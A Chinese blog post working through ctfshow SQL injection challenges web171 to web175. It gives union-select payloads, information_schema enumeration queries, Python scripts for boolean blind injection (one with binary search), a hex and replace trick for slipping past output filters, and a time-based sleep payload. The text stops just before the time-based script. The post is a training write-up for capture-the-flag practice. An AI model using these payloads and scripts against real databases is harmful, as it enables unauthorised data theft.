<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="把之前做过的一些sql注入的题重新做一遍，边做边记录边思考。 ctfshowweb1711$sql &#x3D; &quot;select username,password from user where username !&#x3D;&#x27;flag&#x27; and id &#x3D; &#x27;&quot;.$_GET[&#x27;id&#x27;].&quot;&#x27; limit 1;&quot;;">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入刷题">
<meta property="og:url" content="http://example.com/2024/10/19/sql%E6%B3%A8%E5%85%A5%E5%88%B7%E9%A2%98/index.html">
<meta property="og:site_name" content="My0n9s&#39;blog">
<meta property="og:description" content="把之前做过的一些sql注入的题重新做一遍，边做边记录边思考。 ctfshowweb1711$sql &#x3D; &quot;select username,password from user where username !&#x3D;&#x27;flag&#x27; and id &#x3D; &#x27;&quot;.$_GET[&#x27;id&#x27;].&quot;&#x27; limit 1;&quot;;">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-10-19T05:19:53.000Z">
<meta property="article:modified_time" content="2024-10-20T15:17:22.626Z">
<meta property="article:author" content="My0n9s">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2024/10/19/sql%E6%B3%A8%E5%85%A5%E5%88%B7%E9%A2%98/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2024/10/19/sql%E6%B3%A8%E5%85%A5%E5%88%B7%E9%A2%98/","path":"2024/10/19/sql注入刷题/","title":"sql注入刷题"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sql注入刷题 | My0n9s'blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">My0n9s'blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ctfshow"><span class="nav-number">1.</span> <span class="nav-text">ctfshow</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#web171"><span class="nav-number">1.1.</span> <span class="nav-text">web171</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web172"><span class="nav-number">1.2.</span> <span class="nav-text">web172</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80"><span class="nav-number">1.2.1.</span> <span class="nav-text">解法一</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">反思</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C"><span class="nav-number">1.2.2.</span> <span class="nav-text">解法二</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D-1"><span class="nav-number">1.2.2.1.</span> <span class="nav-text">反思</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%89"><span class="nav-number">1.2.3.</span> <span class="nav-text">解法三</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web173"><span class="nav-number">1.3.</span> <span class="nav-text">web173</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web174"><span class="nav-number">1.4.</span> <span class="nav-text">web174</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-1"><span class="nav-number">1.4.1.</span> <span class="nav-text">解法一</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D-2"><span class="nav-number">1.4.1.1.</span> <span class="nav-text">反思</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-1"><span class="nav-number">1.4.2.</span> <span class="nav-text">解法二</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web175"><span class="nav-number">1.5.</span> <span class="nav-text">web175</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-2"><span class="nav-number">1.5.1.</span> <span class="nav-text">解法一</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D-3"><span class="nav-number">1.5.1.1.</span> <span class="nav-text">反思</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web176"><span class="nav-number">1.6.</span> <span class="nav-text">web176</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-3"><span class="nav-number">1.6.1.</span> <span class="nav-text">解法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-2"><span class="nav-number">1.6.2.</span> <span class="nav-text">解法二</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D-4"><span class="nav-number">1.6.2.1.</span> <span class="nav-text">反思</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web177"><span class="nav-number">1.7.</span> <span class="nav-text">web177</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-4"><span class="nav-number">1.7.1.</span> <span class="nav-text">解法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-3"><span class="nav-number">1.7.2.</span> <span class="nav-text">解法二</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D-5"><span class="nav-number">1.7.2.1.</span> <span class="nav-text">反思</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%89-1"><span class="nav-number">1.7.3.</span> <span class="nav-text">解法三</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web178"><span class="nav-number">1.8.</span> <span class="nav-text">web178</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-5"><span class="nav-number">1.8.1.</span> <span class="nav-text">解法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-4"><span class="nav-number">1.8.2.</span> <span class="nav-text">解法二</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%89-2"><span class="nav-number">1.8.3.</span> <span class="nav-text">解法三</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web179"><span class="nav-number">1.9.</span> <span class="nav-text">web179</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-6"><span class="nav-number">1.9.1.</span> <span class="nav-text">解法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-5"><span class="nav-number">1.9.2.</span> <span class="nav-text">解法二</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D-6"><span class="nav-number">1.9.2.1.</span> <span class="nav-text">反思</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web180"><span class="nav-number">1.10.</span> <span class="nav-text">web180</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-7"><span class="nav-number">1.10.1.</span> <span class="nav-text">解法一</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web181"><span class="nav-number">1.11.</span> <span class="nav-text">web181</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-8"><span class="nav-number">1.11.1.</span> <span class="nav-text">解法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-6"><span class="nav-number">1.11.2.</span> <span class="nav-text">解法二</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%89%E5%8F%8A%E5%85%B6%E4%BB%96"><span class="nav-number">1.11.3.</span> <span class="nav-text">解法三及其他</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D-7"><span class="nav-number">1.11.4.</span> <span class="nav-text">反思</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="My0n9s"
      src="/images/touxiang.jpeg">
  <p class="site-author-name" itemprop="name">My0n9s</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">83</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">22</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/10/19/sql%E6%B3%A8%E5%85%A5%E5%88%B7%E9%A2%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpeg">
      <meta itemprop="name" content="My0n9s">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="My0n9s'blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="sql注入刷题 | My0n9s'blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入刷题
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2024-10-19 13:19:53" itemprop="dateCreated datePublished" datetime="2024-10-19T13:19:53+08:00">2024-10-19</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2024-10-20 23:17:22" itemprop="dateModified" datetime="2024-10-20T23:17:22+08:00">2024-10-20</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>把之前做过的一些sql注入的题重新做一遍，边做边记录边思考。</p>
<h1 id="ctfshow"><a href="#ctfshow" class="headerlink" title="ctfshow"></a>ctfshow</h1><h2 id="web171"><a href="#web171" class="headerlink" title="web171"></a>web171</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="keyword">sql</span> <span class="operator">=</span> &quot;select username,password from user where username !=&#x27;flag&#x27; and id = &#x27;&quot;.$_GET[<span class="string">&#x27;id&#x27;</span>].&quot;&#x27; limit 1;&quot;;</span><br></pre></td></tr></table></figure>

<p>直接给了<code>sql语句</code>，这里我们想办法让它恒真把整张表所有的数据输出来就行了。没有任何过滤，可以用注释符<code>#</code>直接注释掉。</p>
<p>payload : <code>1&#39; or 1%23</code>， 在username为flag字段对应的password里面找到flag。<strong>注意这里我直接用#不行，换了url编码就好了</strong>。 做题的时候可以都试一下，**#不行不一定是把#过滤了，试试%23看行不行**。</p>
<p>当然<code>--+</code> 也可以起到注释的作用</p>
<h2 id="web172"><a href="#web172" class="headerlink" title="web172"></a>web172</h2><h3 id="解法一"><a href="#解法一" class="headerlink" title="解法一"></a>解法一</h3><p>查询语句:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="keyword">sql</span> <span class="operator">=</span> &quot;select username,password from ctfshow_user2 where username !=&#x27;flag&#x27; and id = &#x27;&quot;.$_GET[<span class="string">&#x27;id&#x27;</span>].&quot;&#x27; limit 1;&quot;;</span><br></pre></td></tr></table></figure>

<p>返回逻辑:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span>检查结果是否有flag</span><br><span class="line">    if($<span class="type">row</span><span class="operator">-</span><span class="operator">&gt;</span>username<span class="operator">!=</span><span class="operator">=</span><span class="string">&#x27;flag&#x27;</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      $ret[<span class="string">&#x27;msg&#x27;</span>]<span class="operator">=</span><span class="string">&#x27;查询成功&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这个题目对比71题就是多了一个返回内容的校验。</p>
<p>因为有回显位，其实我们可以用<code>union 联合注入</code>来做，最终的payload:</p>
<p>payload1:<code>-1&#39;union select 1,password from ctfshow_user2 where username=&#39;flag&#39;%23</code></p>
<p>payload2:<code>-1&#39;union select 1,group_concat(password)from ctfshow_user2 %23</code></p>
<p>联合注入的流程：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.oder by 来试探有几列：</span><br><span class="line">2.依次 1&#x27;order by 1 , 1&#x27;order by 2 , 1&#x27;order by 3 , 发现 3的时候是报错的。说明有两列。</span><br><span class="line">3.-1&#x27;union select 1,2%23，来看回显位在哪里。</span><br><span class="line">4.找到回显位之后就是依次暴库，爆表，爆字段，爆值</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; union select 1,database()%23 //数据库名 比如这里为 ctfshow_web</span><br><span class="line">-1&#x27;union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#x27;ctfshow_web&#x27;%23 //爆表名 //爆该数据库下的表名 </span><br><span class="line">-1&#x27;union select 1,group_concat(column_name) from information_schema.columns where table_name=&#x27;ctfshow_user2&#x27;%23//爆表下面的字段名</span><br><span class="line">-1&#x27;union select 1,group_concat(password)from ctfshow_user2 //爆字段的值</span><br></pre></td></tr></table></figure>

<h4 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h4><p>做这个题刚开始犯错的地方：</p>
<p>1.可以用<code>group_concat</code>来连接，直接显示在一起。</p>
<p>2.爆字段名的时候，我把<code>column_name</code>写成了<code>column_table</code> </p>
<p>3.这个题目已经把sql语句给出了，表名也直接告诉我们了，就省略了库名和表名的获取，甚至字段名都告诉我们了，有username和password。</p>
<h3 id="解法二"><a href="#解法二" class="headerlink" title="解法二"></a>解法二</h3><p><code>1&#39;and 1%23</code> 和 <code>1&#39;and 0%23</code> 回显是不一样的，所以可以用布尔盲注。</p>
<p>脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span>  requests</span><br><span class="line"><span class="comment">#url=&quot;http://68c27803-c8cb-44b9-b9f9-b88a8cb1dbea.challenge.ctf.show/api/v2.php?id=1&#x27;and if(substr(database(),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27;,1,0)%23&quot;</span></span><br><span class="line">url=<span class="string">&quot;http://d575b8db-341f-4579-90c7-66f74d93bd7c.challenge.ctf.show/api/v2.php?id=1&#x27;and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=&#x27;ctfshow_web&#x27;),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27;,1,0)%23&quot;</span></span><br><span class="line">dicts=<span class="string">&quot;abcdefghijklmnopqrstuvwxyz0123456789_=&quot;</span></span><br><span class="line">database=<span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">20</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> dicts:</span><br><span class="line">        data=url.<span class="built_in">format</span>(i,j)</span><br><span class="line">        <span class="built_in">print</span>(data)</span><br><span class="line">        res=requests.get(data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;admin&quot;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            database+=j</span><br><span class="line">            <span class="built_in">print</span>(database)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(database)</span><br></pre></td></tr></table></figure>

<p>当然这里的很多地方都是可以改的。包括算法上面的优化(二分法)，后面的盲注题目那里会归纳一下。</p>
<h4 id="反思-1"><a href="#反思-1" class="headerlink" title="反思"></a>反思</h4><p>1.一开始用<code>requests.get(url)</code>的时候一直在报错，后面调了下才发现是<code>https:</code>的问题，改成<code>http</code> 就可以了。</p>
<p>2.传参点不好找，那就抓包去看一下，可以发现<code>/api/v2.php?id=xxx</code></p>
<h3 id="解法三"><a href="#解法三" class="headerlink" title="解法三"></a>解法三</h3><p>这里的解法三其实和解法一本质上是一样的，多的是一个编码的操作，看payload:</p>
<p><code>-1&#39; union select hex(username),hex(password)from ctfshow_user2--+</code></p>
<p><code>-1&#39; union select to_base64(username),to_base64(password)from ctfshow_user2--+</code></p>
<p>反思</p>
<p>这个题目其实不编码也能出，不过这种<strong>编码来绕过的</strong>思想应该去掌握。</p>
<h2 id="web173"><a href="#web173" class="headerlink" title="web173"></a>web173</h2><p>和web172差不多，回显位变成了三位。payload:<code>-1&#39;union select 1,2,group_concat(password)from ctfshow_user3--+</code></p>
<p>不赘述。</p>
<h2 id="web174"><a href="#web174" class="headerlink" title="web174"></a>web174</h2><p>一开始以为是和上面思路差不多，只是在返回的时候加了一些对flag的检查。但这里其实是没有回显到页面上的。<del>不能用联合注入，</del></p>
<p>错了，错了。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span>检查结果是否有flag</span><br><span class="line">    if(<span class="operator">!</span>preg_match(<span class="string">&#x27;/flag|[0-9]/i&#x27;</span>, json_encode($ret)))&#123;</span><br><span class="line">      $ret[<span class="string">&#x27;msg&#x27;</span>]<span class="operator">=</span><span class="string">&#x27;查询成功&#x27;</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>这个题目才是真正的对回显的数据整体做了过滤，<strong>之前那三道环境只是对username字段的返回值作了过滤</strong>。有点问题，导致以为过滤没用。。。这里就是回显的内容里面带有flag或者数字都不行，而很显然flag是带数字的。所以得想办法绕过。</p>
<h3 id="解法一-1"><a href="#解法一-1" class="headerlink" title="解法一"></a>解法一</h3><p>可以用盲注，因为盲注是不会回显到页面上的。所以直接一整个绕过了。但是这里如果直接用我在web172写的脚本，跑的会很慢。。。</p>
<p>所以用二分法。其实二分法就是一个板子。需要替换的是我们写的payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://c6903216-a242-458e-a9ba-b03057f7ea53.challenge.ctf.show/api/v4.php?id=1&#x27;and &quot;</span></span><br><span class="line">result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i = i + <span class="number">1</span></span><br><span class="line">    head = <span class="number">32</span></span><br><span class="line">    tail = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> head &lt; tail:</span><br><span class="line">        mid = (head + tail) &gt;&gt; <span class="number">1</span></span><br><span class="line">        payload = <span class="string">f&#x27;if(ascii(substr((select group_concat(password) from ctfshow_user4 ),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>,1,0) --+&#x27;</span></span><br><span class="line">        r = requests.get(url + payload)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;admin&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            head = mid + <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            tail = mid</span><br><span class="line">    <span class="keyword">if</span> head != <span class="number">32</span>:</span><br><span class="line">        result += <span class="built_in">chr</span>(head)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(result)</span><br></pre></td></tr></table></figure>

<p>参考的y4大佬的板子，这里的payload我们根据实际情况去替换。过滤了哪些，找到<strong>等效</strong>的可以去替换的就可以绕过。比如这里的<code>ascii</code>可以换成<code>ord</code>，后面专门出一块来谈谈过滤。</p>
<h4 id="反思-2"><a href="#反思-2" class="headerlink" title="反思"></a>反思</h4><p>1.这里的payload也记得要加上<code>group_concat</code> 不然会报错。</p>
<p>2.这里后面我们知道flag是在第24行，我们可以把payload改成： <code>payload = f&#39;if(ascii(substr((select group_concat(password) from ctfshow_user4 limit 24,1),&#123;i&#125;,1))&gt;&#123;mid&#125;,1,0) --+&#39;</code></p>
<h3 id="解法二-1"><a href="#解法二-1" class="headerlink" title="解法二"></a>解法二</h3><p>这个思路也是挺有意思，不是不让出现数字和flag吗，我们可以把数字替换成小写字母，这样回显页面上的数据就是正常的。</p>
<p>用到的一个函数为：<code>replace(strings,str1,str2)</code> : 把 strings中出现<code>str1</code>的地方替换成<code>str2</code> 。</p>
<p>demo:</p>
<p><code>-1&#39;union select &#39;a&#39;,replace(replace(replace(&#39;flag&#39;,&#39;a&#39;,&#39;b&#39;),&#39;f&#39;,&#39;a&#39;),&#39;g&#39;,&#39;m&#39;)--+</code></p>
<p>递归来看，把flag里面出现a的地方替换成b，然后再次基础上把f替换成a，依次类推…..</p>
<p>但现在有个问题，就是原来的flag里面也有可能本身就存在小写字母，这样你就无法区分这个小写字母是我们替换而来的还是本身就有的。这个时候可以用hex（）来转一下，mysql语句中，hex得到的字母都是大写的，这样就可以规避了。</p>
<p><code>-1&#39; union select &#39;a&#39;,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),0,&#39;b&#39;),1,&#39;c&#39;),2,&#39;d&#39;),3,&#39;e&#39;),4,&#39;h&#39;),5,&#39;i&#39;),6,&#39;j&#39;),7,&#39;m&#39;),8,&#39;n&#39;),9,&#39;o&#39;) from ctfshow_user4 where username=&#39;flag&#39;--+</code></p>
<p>得到：<code>jemhjjmejnjFmmmBedeieceieiebeeehdDejjienendDehjcenendDeoehjiendDjjebejedjiedeijeebeieneemD</code></p>
<p>然后逆过程，把对应的小写字母换成数字：<code>63746673686F777B32353135353033342D366538382D346138382D393465382D6630363265323563303538337D</code></p>
<p>然后丢到<code>cyberchef</code>里面16进制转一下字符：<code>ctfshow&#123;25155034-6e88-4a88-94e8-f062e25c0583&#125;</code></p>
<h2 id="web175"><a href="#web175" class="headerlink" title="web175"></a>web175</h2><h3 id="解法一-2"><a href="#解法一-2" class="headerlink" title="解法一"></a>解法一</h3><p>这个题目在上一个题目的基础上，对回显内容的判断更为严苛了：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if(<span class="operator">!</span>preg_match(<span class="string">&#x27;/[\x00-\x7f]/i&#x27;</span>, json_encode($ret)))&#123;</span><br><span class="line">  $ret[<span class="string">&#x27;msg&#x27;</span>]<span class="operator">=</span><span class="string">&#x27;查询成功&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>ascii表上的0-127都不能出现，基本上是过滤掉了所有可见字符。</p>
<p>所以我们会发现布尔盲注用不了了，因为<code>?id=1&#39;and 1--+</code> 以及<code>?id=1&#39;and 0 --+</code> 返回的结果是一样的。但是这里我们可以以时间来创造出一个条件来，根据响应的时间来做判断条件。</p>
<p>demo: <code>?id=1&#39;and if(substr(database(),1,1)=&#39;c&#39;,sleep(1),1)--+</code> </p>
<p>我们根据延时来判断条件是否满足。经过测试发现是可以的。</p>
<p>把web174二分法布尔盲注的脚本稍微改下：</p>
